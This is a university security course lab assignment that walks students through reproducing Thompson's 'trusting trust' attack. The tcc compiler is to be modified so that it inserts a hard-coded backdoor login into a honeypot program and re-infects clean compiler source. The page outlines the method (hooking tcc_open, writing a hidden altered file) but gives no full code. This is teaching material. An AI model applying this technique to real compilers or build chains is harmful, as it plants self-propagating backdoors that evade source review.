Skip to content

Spring20Cs361sLab1

sethnielson edited this page Jan 29, 2020 · 2 revisions

Lab 1. 1984

Assigned 1/22/2020
Due 2/5/2020
Points 100

Introduction

In 1984, Ken Thompson wrote a paper called, "Reflections on Trusting Trust." You should have already read this paper as part of your class readings. If you haven't, read it right now.

Thompson's point was that, in the computing world, our supply chains go very, very deep and malware could be hidden within those supply chains. Even if we review our source code, there's nothing to prevent a compiler from corrupting the code when it converts it to binary.

"No problem," you might be thinking, "I'll just review the compiler's source code."

But the problem is that compiler's are compiled. What about the compiler building your compiler?

In this lab, named after the year of Thompson's paper, you will implement the attack Thompson described. That is, you will modify a compiler to corrupt a piece of software during compilation. Then, you will corrupt the compiler to corrupt compilation of the compiler.

Your final corrupted compiler will take uncorrupted compiler source code as input and produce a corrupted binary. The corrupted binary should be able to corrupt uncorrupted compilers and a target piece of source code that will be provided to you.

Just to be clear:

  • S_C is the uncorrupted compiler source code
  • S_C' is the corrupted compiler source code
  • C is the uncorrupted compiler binary
  • C' is the corrupted compiler binary
  • S_A is the uncorrupted application source code
  • A is the uncorrupted application
  • A' is the corrupted application

Note that there is no corrupted application source code.

You need to write corrupted compiler source code S_C' such that the corrupted compiler it produces performs the following functions:

  • S_C -> C' -> C'; that is, the corrupted compiler will take uncorrupted compiler source and produce a corrupted compiler
  • S_A -> C' -> A'; that is, the corrupted compiler will take uncorrupted application source and produce a corrupted application

The most important observation is this: once the corrupted compiler is installed on the victim's machine, there is no corrupted source code. The malware compiler will self replicate, infecting uncorrupted compiler source code.

Step 0. Prerequisites

For this lab, you will need the following tools and a general knowledge of how to use them:

  1. git
  2. gcc
  3. telnet
  4. a posix-compatible build environment (the lab was tested in an Ubuntu WSL envirnoment)

Step 1. Testing out an Uncorrupted Environment

For this part of the assignment, you need to test out building the compiler and building the application code. We could mess with the gcc compiler, but have you ever tried to build gcc? It takes 10 minutes just to unpack it.

To make your life more manageable, we will use a c compiler known as the "Tiny C Compiler," or tcc. tcc is a great little compiler, but it does have a few issues here and there. For our lab, you can't download one of the release versions; you'll have to get it from github using the following command:

git clone https://github.com/TinyCC/tinycc

Once cloned, you need to switch to the mob branch, which has the corrections to the code that we need.

git checkout mob

You should keep a clean (uncorrupted) copy of this code as well as have a copy for your development. You can, of course, just check out a clean copy from git any time you need to, but it might be easier to just copy your repo. Or, you could fork the tcc repo in git. So long as you can readily have clean code in addition to your modified code, you will be fine.

When tcc is installed, it is usually installed into system folders. I highly recommend that you create a directory under your home folder for the installation.

mkdir /home/my_username/tcc_root

Or something similar. When you configure the tcc build, you can tell the build system to install to this location. This is done from within the tcc code directory:

./configure --prefix=/home/my_username/tcc_root

After configuration is complete:

make
make install

You can now compile c programs using ~/tcc_root/bin/tcc. In fact, you can compile tcc with tcc! Try it out.

make clean
./configure --prefix=/home/my_username/tcc_root --cc=/home/my_username/tcc_root/bin/tcc
make
make install

The other program that you need to compile is our target application called tinypot. tinypot is a very small "honeypot". We will talk some about "honeypots" during the year, but basically a "honeypot" is any program designed to lure in a hacker. The honeypot can be used to slow them down/waste their time, but it can also collect information about them.

I was not the original author of tinypot. But I have modified the code to include a simple login with a hard-coded set of authorized users. You can get the code you need from the class github:

git clone https://github.com/CrimsonVista/UTAustin-Courses
cd UTAustin-Courses/2020sp_cs316s/labs/lab1/tinypot

There are only three files in this path: tinypot_main.c, tinypot_process.c, and tinypot_process.h. There is no makefile; to build the application:

/home/my_username/tcc_root/bin/tcc tinypot_main.c tinypot_process.c -pthread -o tinypot

This will create the application tinypot within the folder. To run tinypot listening on port 9999 type the following command:

tinypot - 9999

This starts up the application. You can connect to it with telnet (from another shell)

telnet localhost 9999

After a minute, you should see a login prompt. There are two legal usernames: user1/password1 and user2/password2. If you enter legitimate data, you will see a prompt ($) that will simply echo back anything you type. If the auth data is not legitimate, the connection ends.

Step 2. Application-Corrupting Compiler

Now that you can build your compiler and the tinypot application the next step is to modify the compiler to insert a backdoor when compiling tinypot.

First, let's look at how we want to modify the tinypot code. You can find the hard-coded user authentication data list in the tinypot_process.c file at lines 123-126.

AuthData_t authorizedUsers[] = {
    {"user1", "password1"},
    {"user2", "password2"}
};

So, your job is to modify the compiler such that, during compilation, this file is modified to include a username backdoor with the password backpass.

NOTE: For grading, this data structure is not guaranteed to be in the same place in the file each time. You will need to search for the data structure in order to insert your new line.

There are a number of ways to do this. You're free to choose any method you'd like so long as it doesn't modify the original code file. That is, at the end of compilation tinypot_process.c should not be altered.

However, we will allow you to dynamically create an alternate file that contains the corrupted data. In an ideal world, the compiler wouldn't do this because it's evidence left on the machine for the victim to find. Ideally, the corrupted compiler would modify the data in memory leaving no traces.

But modifying stuff in memory requires understanding how buffers are allocated and potentially re-allocating buffers. For simplicity, we will not require you to do this.

The easiest way to do this is to look at the libtcc.c file. Around line 600 or so is the function tcc_open. This function populates a data structure with the filename, some buffers, and a file descriptor (fd). One approach you could choose to do is:

  1. Check if the filename parameter to tcc_open is tinypot_process.c
  2. If it is, create a new file (perhaps with a leading . to make it "hidden")
  3. Read one line at a time from tinypot_process.c
  4. After reading a line that contains the authorizedUsers line, insert a new line with the backdoor data
  5. Point the fd to the modified file instead of the original file

That's it! You should now be able to compile tinypot and find that you can login with the backdoor data!

Step 3. Compiler-Corrupting Compiler

Now, for the final steps of this lab, you need to modify your evil compiler to corrupt un-corrupted compiler source code.

The operation is not all that different from corrupting the application. The only file that needs to be corrupted is libtcc.c (unless you did something different from the approach I suggested). As before, you should ensure that when that file is compiled the code is modified.

This step is a little bit harder because it's not a one-line modification like it was for the application. Worse, because of a bit of circular logic, you can't just write the modifications directly.

Why?

Because you have to modify the compiler to modify the compiler. So, if you want to have a modified statement, you have to write the modification that inserts the modified statement. But then, you also have to write the modification that inserts the modification that inserts the modified statement.

You may have to do a little thinking to see how to write the self-modifying code. You're welcome to search Google for ideas or ask the TA/professor.

But, once you have it working you should be able to test by compiling tcc with the corrupted tcc. The corrupted tcc should be able to corrupt any other compilations of tcc. And, of course, the corrupted tcc should corrupt tinypot.

Submission and Grading

You must complete this assignment individually but I encourage collaboration. I will adjust the collaboration policy throughout the semester based on the assignment and how well the class is doing. For this assignment, you must write all of your code by yourself, and you may not look at anyone else's code. If you need debugging help, please talk to the professor or the TA.

But you may work together by discussing concepts, strategies, and even generic algorithms and pseudo-code. So long as you are not writing code together, or sharing code, you may work in any size group.

Each submission is individual via github. To submit:

  1. Use git to create a patch for tinycc using git diff > tinycc.patch from the tinycc repo
  2. Commit the patch in your class repo under labs/lab1/tinycc.patch
  3. Tag your commit using git tag lab1-1.0. If you make a change after submission, re-commit and tag with git tag lab1-1.x where x is one greater than the last submission

Your submission will be graded as follows:

  1. 50 points. Modified compiler correctly corrupts the tinypot application
  2. 50 points. Modified compiler correctly corrupts tcc
  3. 20 points (extra credit). Modifies compiled files in memory without creating corrupted files on disk (all corruption in memory)

If you want the extra credit mentioned above, include a file labs/lab1/inmemory.txt that describes how you perform the in-memory modifications.

Clone this wiki locally